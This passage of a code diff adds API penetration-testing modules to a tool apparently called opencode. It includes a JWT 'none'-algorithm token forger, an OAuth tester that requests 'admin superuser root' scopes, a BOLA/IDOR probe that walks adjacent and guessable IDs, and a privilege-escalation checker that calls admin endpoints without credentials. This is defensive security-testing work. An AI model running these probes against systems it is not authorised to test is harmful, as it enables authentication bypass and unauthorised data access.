+    const newPayload = { ...analysis.payload, ...modifications.payload }
+
+    const headerB64 = Buffer.from(JSON.stringify(newHeader)).toString("base64url")
+    const payloadB64 = Buffer.from(JSON.stringify(newPayload)).toString("base64url")
+
+    // Use empty signature for 'none' algorithm, otherwise keep original
+    const signature = newHeader.alg === "none" ? "" : analysis.signature
+
+    return `${headerB64}.${payloadB64}.${signature}`
+  }
+
+  /**
+   * Create a 'none' algorithm token for testing.
+   *
+   * @param analysis - Original token analysis
+   * @returns Token with 'none' algorithm and no signature
+   */
+  export function createNoneAlgToken(analysis: ApiScanTypes.JwtAnalysis): string {
+    return createTestToken(analysis, { header: { alg: "none" } })
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/auth/oauth.ts b/packages/opencode/src/pentest/apiscan/auth/oauth.ts
new file mode 100644
index 00000000000..349ca24133d
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/auth/oauth.ts
@@ -0,0 +1,489 @@
+/**
+ * @fileoverview OAuth Testing
+ *
+ * Tests OAuth 2.0 authentication flows for common vulnerabilities.
+ *
+ * @module pentest/apiscan/auth/oauth
+ */
+
+import { ApiScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "apiscan.oauth" })
+
+/**
+ * OAuth test result.
+ */
+export interface OAuthTestResult {
+  valid: boolean
+  tokenObtained: boolean
+  accessToken?: string
+  tokenType?: string
+  expiresIn?: number
+  issues: string[]
+  recommendations: string[]
+  tests: {
+    name: string
+    passed: boolean
+    description: string
+  }[]
+}
+
+/**
+ * OAuth tester namespace.
+ */
+export namespace OAuthTester {
+  /**
+   * Test OAuth 2.0 authentication.
+   *
+   * @param config - OAuth configuration
+   * @param timeout - Request timeout
+   * @returns Test result
+   */
+  export async function test(
+    config: ApiScanTypes.OAuthConfig,
+    timeout = 10000
+  ): Promise<OAuthTestResult> {
+    log.info("Testing OAuth authentication", { tokenUrl: config.tokenUrl, grantType: config.grantType })
+
+    const tests: OAuthTestResult["tests"] = []
+    const issues: string[] = []
+    const recommendations: string[] = []
+    let accessToken: string | undefined
+    let tokenType: string | undefined
+    let expiresIn: number | undefined
+
+    // Test 1: Token endpoint reachable
+    const reachableTest = await testTokenEndpointReachable(config.tokenUrl, timeout)
+    tests.push(reachableTest)
+    if (!reachableTest.passed) {
+      issues.push("Token endpoint not reachable")
+    }
+
+    // Test 2: HTTPS enforcement
+    const httpsTest = testHttpsEnforcement(config.tokenUrl)
+    tests.push(httpsTest)
+    if (!httpsTest.passed) {
+      issues.push("Token endpoint does not use HTTPS")
+      recommendations.push("Always use HTTPS for OAuth token endpoints")
+    }
+
+    // Test 3: Obtain token with valid credentials
+    const tokenResult = await testTokenObtain(config, timeout)
+    tests.push(tokenResult.test)
+    if (tokenResult.accessToken) {
+      accessToken = tokenResult.accessToken
+      tokenType = tokenResult.tokenType
+      expiresIn = tokenResult.expiresIn
+    } else {
+      issues.push("Could not obtain access token with provided credentials")
+    }
+
+    // Test 4: Invalid credentials rejected
+    const invalidCredsTest = await testInvalidCredentials(config, timeout)
+    tests.push(invalidCredsTest)
+    if (!invalidCredsTest.passed) {
+      issues.push("Invalid credentials not properly rejected")
+    }
+
+    // Test 5: Scope restrictions
+    if (config.scopes && config.scopes.length > 0) {
+      const scopeTest = await testScopeRestrictions(config, timeout)
+      tests.push(scopeTest)
+      if (!scopeTest.passed) {
+        recommendations.push("Implement proper scope restrictions")
+      }
+    }
+
+    // Test 6: Token expiration
+    const expirationTest = testTokenExpiration(expiresIn)
+    tests.push(expirationTest)
+    if (!expirationTest.passed) {
+      issues.push("Access token has long or no expiration")
+      recommendations.push("Use short-lived access tokens (15-60 minutes)")
+    }
+
+    // Test 7: Error response information disclosure
+    const errorDisclosureTest = await testErrorDisclosure(config, timeout)
+    tests.push(errorDisclosureTest)
+    if (!errorDisclosureTest.passed) {
+      issues.push("Error responses may disclose sensitive information")
+      recommendations.push("Use generic error messages to prevent information leakage")
+    }
+
+    const valid = issues.length === 0
+    const tokenObtained = !!accessToken
+
+    log.info("OAuth testing complete", {
+      valid,
+      tokenObtained,
+      testsPassed: tests.filter((t) => t.passed).length,
+      testsTotal: tests.length,
+    })
+
+    return {
+      valid,
+      tokenObtained,
+      accessToken,
+      tokenType,
+      expiresIn,
+      issues,
+      recommendations,
+      tests,
+    }
+  }
+
+  /**
+   * Test if token endpoint is reachable.
+   */
+  async function testTokenEndpointReachable(
+    tokenUrl: string,
+    timeout: number
+  ): Promise<OAuthTestResult["tests"][0]> {
+    try {
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(tokenUrl, {
+        method: "POST",
+        headers: { "Content-Type": "application/x-www-form-urlencoded" },
+        body: "grant_type=client_credentials",
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      // Any response means endpoint is reachable
+      return {
+        name: "Endpoint Reachable",
+        passed: true,
+        description: `Token endpoint responded with status ${response.status}`,
+      }
+    } catch (err) {
+      return {
+        name: "Endpoint Reachable",
+        passed: false,
+        description: `Token endpoint not reachable: ${(err as Error).message}`,
+      }
+    }
+  }
+
+  /**
+   * Test HTTPS enforcement.
+   */
+  function testHttpsEnforcement(tokenUrl: string): OAuthTestResult["tests"][0] {
+    const isHttps = tokenUrl.startsWith("https://")
+    return {
+      name: "HTTPS Enforcement",
+      passed: isHttps,
+      description: isHttps ? "Token endpoint uses HTTPS" : "Token endpoint does not use HTTPS",
+    }
+  }
+
+  /**
+   * Test token obtain with valid credentials.
+   */
+  async function testTokenObtain(
+    config: ApiScanTypes.OAuthConfig,
+    timeout: number
+  ): Promise<{
+    test: OAuthTestResult["tests"][0]
+    accessToken?: string
+    tokenType?: string
+    expiresIn?: number
+  }> {
+    try {
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      let body: string
+
+      if (config.grantType === "client_credentials") {
+        const params = new URLSearchParams({
+          grant_type: "client_credentials",
+          client_id: config.clientId,
+          client_secret: config.clientSecret,
+        })
+        if (config.scopes?.length) {
+          params.set("scope", config.scopes.join(" "))
+        }
+        body = params.toString()
+      } else {
+        body = new URLSearchParams({
+          grant_type: config.grantType,
+          client_id: config.clientId,
+          client_secret: config.clientSecret,
+        }).toString()
+      }
+
+      const response = await fetch(config.tokenUrl, {
+        method: "POST",
+        headers: { "Content-Type": "application/x-www-form-urlencoded" },
+        body,
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      if (response.ok) {
+        const data = await response.json()
+        return {
+          test: {
+            name: "Token Obtain",
+            passed: true,
+            description: "Successfully obtained access token",
+          },
+          accessToken: data.access_token,
+          tokenType: data.token_type,
+          expiresIn: data.expires_in,
+        }
+      }
+
+      return {
+        test: {
+          name: "Token Obtain",
+          passed: false,
+          description: `Token request failed with status ${response.status}`,
+        },
+      }
+    } catch (err) {
+      return {
+        test: {
+          name: "Token Obtain",
+          passed: false,
+          description: `Token request error: ${(err as Error).message}`,
+        },
+      }
+    }
+  }
+
+  /**
+   * Test that invalid credentials are rejected.
+   */
+  async function testInvalidCredentials(
+    config: ApiScanTypes.OAuthConfig,
+    timeout: number
+  ): Promise<OAuthTestResult["tests"][0]> {
+    try {
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const body = new URLSearchParams({
+        grant_type: config.grantType,
+        client_id: "invalid_client_id",
+        client_secret: "invalid_client_secret",
+      }).toString()
+
+      const response = await fetch(config.tokenUrl, {
+        method: "POST",
+        headers: { "Content-Type": "application/x-www-form-urlencoded" },
+        body,
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      // Should get 401 or 400
+      const passed = response.status === 401 || response.status === 400
+      return {
+        name: "Invalid Credentials Test",
+        passed,
+        description: passed
+          ? "Invalid credentials properly rejected"
+          : `Invalid credentials returned status ${response.status}`,
+      }
+    } catch {
+      return {
+        name: "Invalid Credentials Test",
+        passed: false,
+        description: "Could not test invalid credentials",
+      }
+    }
+  }
+
+  /**
+   * Test scope restrictions.
+   */
+  async function testScopeRestrictions(
+    config: ApiScanTypes.OAuthConfig,
+    timeout: number
+  ): Promise<OAuthTestResult["tests"][0]> {
+    try {
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      // Request elevated scopes
+      const body = new URLSearchParams({
+        grant_type: config.grantType,
+        client_id: config.clientId,
+        client_secret: config.clientSecret,
+        scope: "admin superuser root *",
+      }).toString()
+
+      const response = await fetch(config.tokenUrl, {
+        method: "POST",
+        headers: { "Content-Type": "application/x-www-form-urlencoded" },
+        body,
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      if (response.ok) {
+        const data = await response.json()
+        // Check if elevated scopes were granted
+        const grantedScopes = (data.scope as string)?.split(" ") || []
+        const elevatedGranted = grantedScopes.some((s: string) =>
+          ["admin", "superuser", "root", "*"].includes(s)
+        )
+
+        return {
+          name: "Scope Restrictions",
+          passed: !elevatedGranted,
+          description: elevatedGranted
+            ? "Elevated scopes were granted without authorization"
+            : "Elevated scope request was limited or rejected",
+        }
+      }
+
+      // 400 is expected for invalid scopes
+      return {
+        name: "Scope Restrictions",
+        passed: true,
+        description: "Invalid scope request was rejected",
+      }
+    } catch {
+      return {
+        name: "Scope Restrictions",
+        passed: true,
+        description: "Could not test scope restrictions",
+      }
+    }
+  }
+
+  /**
+   * Test token expiration.
+   */
+  function testTokenExpiration(expiresIn?: number): OAuthTestResult["tests"][0] {
+    if (!expiresIn) {
+      return {
+        name: "Token Expiration",
+        passed: false,
+        description: "No expiration time provided in token response",
+      }
+    }
+
+    // Recommended: 15-60 minutes (900-3600 seconds)
+    const isShortLived = expiresIn <= 3600
+    return {
+      name: "Token Expiration",
+      passed: isShortLived,
+      description: isShortLived
+        ? `Token expires in ${expiresIn} seconds (good)`
+        : `Token expires in ${expiresIn} seconds (too long, recommend < 3600)`,
+    }
+  }
+
+  /**
+   * Test for information disclosure in error responses.
+   */
+  async function testErrorDisclosure(
+    config: ApiScanTypes.OAuthConfig,
+    timeout: number
+  ): Promise<OAuthTestResult["tests"][0]> {
+    try {
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      // Send invalid request to get error response
+      const body = new URLSearchParams({
+        grant_type: "invalid_grant_type",
+        client_id: config.clientId,
+        client_secret: config.clientSecret,
+      }).toString()
+
+      const response = await fetch(config.tokenUrl, {
+        method: "POST",
+        headers: { "Content-Type": "application/x-www-form-urlencoded" },
+        body,
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      const text = await response.text()
+
+      // Check for sensitive information in error
+      const sensitivePatterns = [
+        /stack\s*trace/i,
+        /exception/i,
+        /sql/i,
+        /database/i,
+        /internal\s*error/i,
+        /file\s*path/i,
+      ]
+
+      const hasDisclosure = sensitivePatterns.some((p) => p.test(text))
+
+      return {
+        name: "Error Disclosure",
+        passed: !hasDisclosure,
+        description: hasDisclosure
+          ? "Error response may contain sensitive information"
+          : "Error responses appear properly sanitized",
+      }
+    } catch {
+      return {
+        name: "Error Disclosure",
+        passed: true,
+        description: "Could not test error disclosure",
+      }
+    }
+  }
+
+  /**
+   * Format test result for display.
+   *
+   * @param result - Test result
+   * @returns Formatted string
+   */
+  export function format(result: OAuthTestResult): string {
+    const lines: string[] = []
+
+    lines.push("OAuth Test Results")
+    lines.push("==================")
+    lines.push("")
+    lines.push(`Overall: ${result.valid ? "PASSED" : "ISSUES FOUND"}`)
+    lines.push(`Token Obtained: ${result.tokenObtained ? "Yes" : "No"}`)
+
+    if (result.tokenObtained) {
+      lines.push(`Token Type: ${result.tokenType || "unknown"}`)
+      lines.push(`Expires In: ${result.expiresIn ? `${result.expiresIn} seconds` : "unknown"}`)
+    }
+
+    lines.push("")
+    lines.push("Tests:")
+    for (const test of result.tests) {
+      const status = test.passed ? "[PASS]" : "[FAIL]"
+      lines.push(`  ${status} ${test.name}: ${test.description}`)
+    }
+
+    if (result.issues.length > 0) {
+      lines.push("")
+      lines.push("Issues:")
+      for (const issue of result.issues) {
+        lines.push(`  - ${issue}`)
+      }
+    }
+
+    if (result.recommendations.length > 0) {
+      lines.push("")
+      lines.push("Recommendations:")
+      for (const rec of result.recommendations) {
+        lines.push(`  - ${rec}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/authz/bola.ts b/packages/opencode/src/pentest/apiscan/authz/bola.ts
new file mode 100644
index 00000000000..2a864f7831e
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/authz/bola.ts
@@ -0,0 +1,333 @@
+/**
+ * @fileoverview BOLA/IDOR Detection
+ *
+ * Tests for Broken Object Level Authorization (BOLA)
+ * and Insecure Direct Object Reference (IDOR) vulnerabilities.
+ *
+ * @module pentest/apiscan/authz/bola
+ */
+
+import { ApiScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "apiscan.bola" })
+
+/**
+ * BOLA detection options.
+ */
+export interface BolaTestOptions {
+  /** Authentication config for the victim user */
+  victimAuth: ApiScanTypes.AuthConfig
+  /** Test IDs to try accessing */
+  testIds: string[]
+  /** Request timeout in ms */
+  timeout?: number
+  /** Custom headers */
+  headers?: Record<string, string>
+}
+
+/**
+ * BOLA detector namespace.
+ */
+export namespace BolaDetector {
+  /**
+   * Test an endpoint for BOLA/IDOR vulnerabilities.
+   *
+   * @param endpoint - Endpoint to test
+   * @param baseUrl - Base URL
+   * @param originalId - The ID the authenticated user should have access to
+   * @param options - Test options
+   * @returns BOLA test result
+   */
+  export async function testEndpoint(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    baseUrl: string,
+    originalId: string,
+    options: BolaTestOptions
+  ): Promise<ApiScanTypes.BolaTestResult> {
+    const { victimAuth, testIds, timeout = 10000, headers = {} } = options
+
+    log.info("Testing endpoint for BOLA", {
+      path: endpoint.path,
+      method: endpoint.method,
+      testIdCount: testIds.length,
+    })
+
+    const responses: ApiScanTypes.BolaTestResult["responses"] = []
+    const accessibleIds: string[] = []
+
+    // Build auth headers
+    const authHeaders = buildAuthHeaders(victimAuth)
+
+    // Test each ID
+    for (const testId of testIds) {
+      const result = await testIdAccess(endpoint, baseUrl, originalId, testId, {
+        ...headers,
+        ...authHeaders,
+      }, timeout)
+      responses.push(result)
+
+      if (result.accessible && testId !== originalId) {
+        accessibleIds.push(testId)
+      }
+    }
+
+    const vulnerable = accessibleIds.length > 0
+
+    log.info("BOLA test complete", {
+      path: endpoint.path,
+      vulnerable,
+      accessibleCount: accessibleIds.length,
+    })
+
+    return {
+      endpoint: endpoint.path,
+      method: endpoint.method,
+      originalId,
+      testedIds: testIds,
+      vulnerable,
+      accessibleIds,
+      responses,
+    }
+  }
+
+  /**
+   * Build authentication headers from config.
+   *
+   * @param auth - Auth config
+   * @returns Headers object
+   */
+  function buildAuthHeaders(auth: ApiScanTypes.AuthConfig): Record<string, string> {
+    switch (auth.type) {
+      case "bearer":
+      case "jwt":
+        return auth.token ? { Authorization: `Bearer ${auth.token}` } : {}
+      case "basic":
+        if (auth.basic) {
+          const credentials = Buffer.from(`${auth.basic.username}:${auth.basic.password}`).toString("base64")
+          return { Authorization: `Basic ${credentials}` }
+        }
+        return {}
+      case "apikey":
+        if (auth.apiKey) {
+          return { [auth.apiKey.header]: auth.apiKey.value }
+        }
+        return {}
+      default:
+        return {}
+    }
+  }
+
+  /**
+   * Test access to a specific ID.
+   *
+   * @param endpoint - Endpoint to test
+   * @param baseUrl - Base URL
+   * @param originalId - Original ID in the path
+   * @param testId - ID to test
+   * @param headers - Request headers
+   * @param timeout - Request timeout
+   * @returns Test response
+   */
+  async function testIdAccess(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    baseUrl: string,
+    originalId: string,
+    testId: string,
+    headers: Record<string, string>,
+    timeout: number
+  ): Promise<ApiScanTypes.BolaTestResult["responses"][0]> {
+    try {
+      // Replace the ID in the path
+      const path = endpoint.path.replace(`{${findIdParameter(endpoint)}}`, testId)
+      const url = new URL(path, baseUrl).toString()
+
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(url, {
+        method: endpoint.method,
+        headers: {
+          Accept: "application/json",
+          ...headers,
+        },
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      // Consider 2xx as accessible
+      const accessible = response.status >= 200 && response.status < 300
+
+      return {
+        id: testId,
+        statusCode: response.status,
+        accessible,
+      }
+    } catch (err) {
+      log.debug("BOLA test request failed", { testId, error: (err as Error).message })
+      return {
+        id: testId,
+        statusCode: 0,
+        accessible: false,
+      }
+    }
+  }
+
+  /**
+   * Find the ID parameter name in the endpoint.
+   *
+   * @param endpoint - Endpoint
+   * @returns Parameter name or 'id'
+   */
+  function findIdParameter(endpoint: ApiScanTypes.ApiEndpoint): string {
+    // Look for path parameters that look like IDs
+    const idPatterns = [/id$/i, /Id$/, /_id$/i, /ID$/]
+
+    for (const param of endpoint.parameters) {
+      if (param.in === "path") {
+        for (const pattern of idPatterns) {
+          if (pattern.test(param.name)) {
+            return param.name
+          }
+        }
+      }
+    }
+
+    // Look in the path directly
+    const pathMatch = endpoint.path.match(/\{(\w*[Ii]d\w*)\}/)
+    if (pathMatch) {
+      return pathMatch[1]
+    }
+
+    // Default to 'id'
+    return "id"
+  }
+
+  /**
+   * Find endpoints that are likely vulnerable to BOLA.
+   *
+   * @param endpoints - All endpoints
+   * @returns Endpoints with ID parameters
+   */
+  export function findVulnerableEndpoints(endpoints: ApiScanTypes.ApiEndpoint[]): ApiScanTypes.ApiEndpoint[] {
+    const idPatterns = [/\{.*id.*\}/i, /\{.*uuid.*\}/i, /\{.*user.*\}/i, /\{.*account.*\}/i]
+
+    return endpoints.filter((endpoint) => {
+      // Check for ID-like path parameters
+      for (const pattern of idPatterns) {
+        if (pattern.test(endpoint.path)) {
+          return true
+        }
+      }
+      return false
+    })
+  }
+
+  /**
+   * Generate test IDs for BOLA testing.
+   *
+   * @param originalId - The original/valid ID
+   * @param idType - Type of ID (numeric, uuid, string)
+   * @param count - Number of test IDs to generate
+   * @returns Array of test IDs
+   */
+  export function generateTestIds(originalId: string, idType: "numeric" | "uuid" | "string" = "numeric", count = 5): string[] {
+    const ids: string[] = []
+
+    // Always include original
+    ids.push(originalId)
+
+    switch (idType) {
+      case "numeric": {
+        const numId = parseInt(originalId, 10)
+        if (!isNaN(numId)) {
+          // Adjacent IDs
+          ids.push(String(numId - 1))
+          ids.push(String(numId + 1))
+          ids.push(String(numId - 10))
+          ids.push(String(numId + 10))
+          // Common IDs
+          ids.push("1")
+          ids.push("0")
+          ids.push("-1")
+        }
+        break
+      }
+      case "uuid": {
+        // Generate variations
+        ids.push("00000000-0000-0000-0000-000000000000")
+        ids.push("00000000-0000-0000-0000-000000000001")
+        ids.push("ffffffff-ffff-ffff-ffff-ffffffffffff")
+        // Modify last byte of original
+        if (originalId.match(/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i)) {
+          const lastByte = originalId.slice(-2)
+          const nextByte = (parseInt(lastByte, 16) + 1).toString(16).padStart(2, "0")
+          ids.push(originalId.slice(0, -2) + nextByte)
+        }
+        break
+      }
+      case "string": {
+        // Common usernames/IDs
+        ids.push("admin")
+        ids.push("root")
+        ids.push("test")
+        ids.push("user")
+        ids.push("1")
+        break
+      }
+    }
+
+    return [...new Set(ids)].slice(0, count + 1) // Unique, limited count
+  }
+
+  /**
+   * Detect ID type from a sample ID.
+   *
+   * @param id - Sample ID
+   * @returns Detected ID type
+   */
+  export function detectIdType(id: string): "numeric" | "uuid" | "string" {
+    if (/^\d+$/.test(id)) {
+      return "numeric"
+    }
+    if (/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i.test(id)) {
+      return "uuid"
+    }
+    return "string"
+  }
+
+  /**
+   * Format BOLA test result for display.
+   *
+   * @param result - Test result
+   * @returns Formatted string
+   */
+  export function format(result: ApiScanTypes.BolaTestResult): string {
+    const lines: string[] = []
+
+    lines.push("BOLA Test Result")
+    lines.push("================")
+    lines.push("")
+    lines.push(`Endpoint: ${result.method} ${result.endpoint}`)
+    lines.push(`Original ID: ${result.originalId}`)
+    lines.push(`Vulnerable: ${result.vulnerable ? "YES" : "NO"}`)
+
+    if (result.vulnerable) {
+      lines.push("")
+      lines.push("Accessible IDs (unauthorized):")
+      for (const id of result.accessibleIds) {
+        lines.push(`  - ${id}`)
+      }
+    }
+
+    lines.push("")
+    lines.push("Test Results:")
+    for (const resp of result.responses) {
+      const status = resp.accessible ? "[ACCESSIBLE]" : "[BLOCKED]"
+      lines.push(`  ${status} ID: ${resp.id} - HTTP ${resp.statusCode}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/authz/index.ts b/packages/opencode/src/pentest/apiscan/authz/index.ts
new file mode 100644
index 00000000000..500412117e4
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/authz/index.ts
@@ -0,0 +1,10 @@
+/**
+ * @fileoverview Authorization Testing Modules
+ *
+ * Exports BOLA and privilege escalation testing utilities.
+ *
+ * @module pentest/apiscan/authz
+ */
+
+export { BolaDetector, type BolaTestOptions } from "./bola"
+export { PrivilegeTester, type PrivilegeTestResult, type PrivilegeTestOptions } from "./privilege"
diff --git a/packages/opencode/src/pentest/apiscan/authz/privilege.ts b/packages/opencode/src/pentest/apiscan/authz/privilege.ts
new file mode 100644
index 00000000000..6bd66f41b27
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/authz/privilege.ts
@@ -0,0 +1,371 @@
+/**
+ * @fileoverview Privilege Escalation Testing
+ *
+ * Tests for Broken Function Level Authorization (BFLA)
+ * and vertical privilege escalation vulnerabilities.
+ *
+ * @module pentest/apiscan/authz/privilege
+ */
+
+import { ApiScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "apiscan.privilege" })
+
+/**
+ * Privilege test result.
+ */
+export interface PrivilegeTestResult {
+  endpoint: string
+  method: ApiScanTypes.HttpMethod
+  adminRequired: boolean
+  accessibleWithUserAuth: boolean
+  accessibleWithoutAuth: boolean
+  vulnerable: boolean
+  issues: string[]
+}
+
+/**
+ * Privilege test options.
+ */
+export interface PrivilegeTestOptions {
+  /** User-level authentication */
+  userAuth?: ApiScanTypes.AuthConfig
+  /** Admin-level authentication (for baseline) */
+  adminAuth?: ApiScanTypes.AuthConfig
+  /** Request timeout */
+  timeout?: number
+  /** Custom headers */
+  headers?: Record<string, string>
+}
+
+/**
+ * Privilege escalation tester namespace.
+ */
+export namespace PrivilegeTester {
+  /**
+   * Sensitive operation patterns that typically require elevated privileges.
+   */
+  const ADMIN_PATTERNS = [
+    /\/admin\//i,
+    /\/management\//i,
+    /\/internal\//i,
+    /\/system\//i,
+    /\/config/i,
+    /\/settings/i,
+    /\/users\/.*\/role/i,
+    /\/users\/.*\/permissions/i,
+    /\/roles/i,
+    /\/permissions/i,
+    /\/audit/i,
+    /\/logs/i,
+    /\/backup/i,
+    /\/restore/i,
+    /\/import/i,
+    /\/export/i,
+    /\/delete.*all/i,
+    /\/purge/i,
+    /\/reset/i,
+  ]
+
+  /**
+   * Dangerous HTTP methods that may allow privilege escalation.
+   */
+  const DANGEROUS_METHODS: ApiScanTypes.HttpMethod[] = ["DELETE", "PUT", "PATCH", "POST"]
+
+  /**
+   * Test an endpoint for privilege escalation vulnerabilities.
+   *
+   * @param endpoint - Endpoint to test
+   * @param baseUrl - Base URL
+   * @param options - Test options
+   * @returns Privilege test result
+   */
+  export async function testEndpoint(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    baseUrl: string,
+    options: PrivilegeTestOptions = {}
+  ): Promise<PrivilegeTestResult> {
+    const { userAuth, adminAuth, timeout = 10000, headers = {} } = options
+
+    log.info("Testing endpoint for privilege escalation", {
+      path: endpoint.path,
+      method: endpoint.method,
+    })
+
+    const issues: string[] = []
+
+    // Determine if endpoint looks like it requires admin access
+    const adminRequired = isAdminEndpoint(endpoint)
+
+    // Test with admin auth (baseline - should work)
+    let adminAccessible = false
+    if (adminAuth) {
+      adminAccessible = await testAccess(endpoint, baseUrl, adminAuth, headers, timeout)
+    }
+
+    // Test with user auth
+    let accessibleWithUserAuth = false
+    if (userAuth) {
+      accessibleWithUserAuth = await testAccess(endpoint, baseUrl, userAuth, headers, timeout)
+    }
+
+    // Test without auth
+    const accessibleWithoutAuth = await testAccess(endpoint, baseUrl, undefined, headers, timeout)
+
+    // Determine vulnerability
+    let vulnerable = false
+
+    if (adminRequired) {
+      // Admin endpoint should not be accessible with user auth or no auth
+      if (accessibleWithUserAuth) {
+        vulnerable = true
+        issues.push("Admin endpoint accessible with regular user authentication")
+      }
+      if (accessibleWithoutAuth) {
+        vulnerable = true
+        issues.push("Admin endpoint accessible without authentication")
+      }
+    } else {
+      // Even non-admin endpoints shouldn't be accessible without auth if security is defined
+      if (endpoint.security && endpoint.security.length > 0 && accessibleWithoutAuth) {
+        vulnerable = true
+        issues.push("Protected endpoint accessible without authentication")
+      }
+    }
+
+    // Check for dangerous method on sensitive endpoint
+    if (DANGEROUS_METHODS.includes(endpoint.method) && accessibleWithUserAuth) {
+      const sensitivePatterns = [/\/users\//i, /\/accounts\//i, /\/profile/i, /\/settings/i]
+      const isSensitive = sensitivePatterns.some((p) => p.test(endpoint.path))
+      if (isSensitive && !adminRequired) {
+        issues.push(`${endpoint.method} method available on sensitive endpoint with user auth - verify proper authorization`)
+      }
+    }
+
+    log.info("Privilege test complete", {
+      path: endpoint.path,
+      vulnerable,
+      issueCount: issues.length,
+    })
+
+    return {
+      endpoint: endpoint.path,
+      method: endpoint.method,
+      adminRequired,
+      accessibleWithUserAuth,
+      accessibleWithoutAuth,
+      vulnerable,
+      issues,
+    }
+  }
+
+  /**
+   * Test if an endpoint is accessible with given auth.
+   *
+   * @param endpoint - Endpoint
+   * @param baseUrl - Base URL
+   * @param auth - Auth config
+   * @param headers - Custom headers
+   * @param timeout - Timeout
+   * @returns true if accessible (2xx response)
+   */
+  async function testAccess(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    baseUrl: string,
+    auth: ApiScanTypes.AuthConfig | undefined,
+    headers: Record<string, string>,
+    timeout: number
+  ): Promise<boolean> {
+    try {
+      const url = new URL(endpoint.path, baseUrl).toString()
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const requestHeaders: Record<string, string> = {
+        Accept: "application/json",
+        ...headers,
+      }
+
+      // Add auth headers
+      if (auth) {
+        switch (auth.type) {
+          case "bearer":
+          case "jwt":
+            if (auth.token) {
+              requestHeaders.Authorization = `Bearer ${auth.token}`
+            }
+            break
+          case "basic":
+            if (auth.basic) {
+              const credentials = Buffer.from(`${auth.basic.username}:${auth.basic.password}`).toString("base64")
+              requestHeaders.Authorization = `Basic ${credentials}`
+            }
+            break
+          case "apikey":
+            if (auth.apiKey) {
+              requestHeaders[auth.apiKey.header] = auth.apiKey.value
+            }
+            break
+        }
+      }
+
+      const response = await fetch(url, {
+        method: endpoint.method,
+        headers: requestHeaders,
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      // 2xx is accessible, 4xx/5xx is not
+      return response.status >= 200 && response.status < 300
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Check if an endpoint appears to require admin access.
+   *
+   * @param endpoint - Endpoint to check
+   * @returns true if admin endpoint
+   */
+  function isAdminEndpoint(endpoint: ApiScanTypes.ApiEndpoint): boolean {
+    // Check path against admin patterns
+    for (const pattern of ADMIN_PATTERNS) {
+      if (pattern.test(endpoint.path)) {
+        return true
+      }
+    }
+
+    // Check tags
+    if (endpoint.tags) {
+      const adminTags = ["admin", "management", "internal", "system"]
+      for (const tag of endpoint.tags) {
+        if (adminTags.some((at) => tag.toLowerCase().includes(at))) {
+          return true
+        }
+      }
+    }
+
+    // Check summary/description
+    const adminKeywords = ["admin", "administrator", "superuser", "elevated", "privileged"]
+    const text = `${endpoint.summary || ""} ${endpoint.description || ""}`.toLowerCase()
+    for (const keyword of adminKeywords) {
+      if (text.includes(keyword)) {
+        return true
+      }
+    }
+
+    return false
+  }
+
+  /**
+   * Find endpoints that may be vulnerable to privilege escalation.
+   *
+   * @param endpoints - All endpoints
+   * @returns Potentially vulnerable endpoints
+   */
+  export function findSensitiveEndpoints(endpoints: ApiScanTypes.ApiEndpoint[]): ApiScanTypes.ApiEndpoint[] {
+    return endpoints.filter((endpoint) => {
+      // Admin endpoints
+      if (isAdminEndpoint(endpoint)) {
+        return true
+      }
+
+      // Dangerous methods on user resources
+      if (DANGEROUS_METHODS.includes(endpoint.method)) {
+        const userPatterns = [/\/users\//i, /\/accounts\//i, /\/me\//i, /\/profile/i]
+        return userPatterns.some((p) => p.test(endpoint.path))
+      }
+
+      return false
+    })
+  }
+
+  /**
+   * Test multiple endpoints for privilege escalation.
+   *
+   * @param endpoints - Endpoints to test
+   * @param baseUrl - Base URL
+   * @param options - Test options
+   * @returns Array of test results
+   */
+  export async function testEndpoints(
+    endpoints: ApiScanTypes.ApiEndpoint[],
+    baseUrl: string,
+    options: PrivilegeTestOptions = {}
+  ): Promise<PrivilegeTestResult[]> {
+    const results: PrivilegeTestResult[] = []
+
+    for (const endpoint of endpoints) {
+      const result = await testEndpoint(endpoint, baseUrl, options)
+      results.push(result)
+    }
+
+    return results
+  }
+
+  /**
+   * Format test result for display.
+   *
+   * @param result - Test result
+   * @returns Formatted string
+   */
+  export function format(result: PrivilegeTestResult): string {
+    const lines: string[] = []
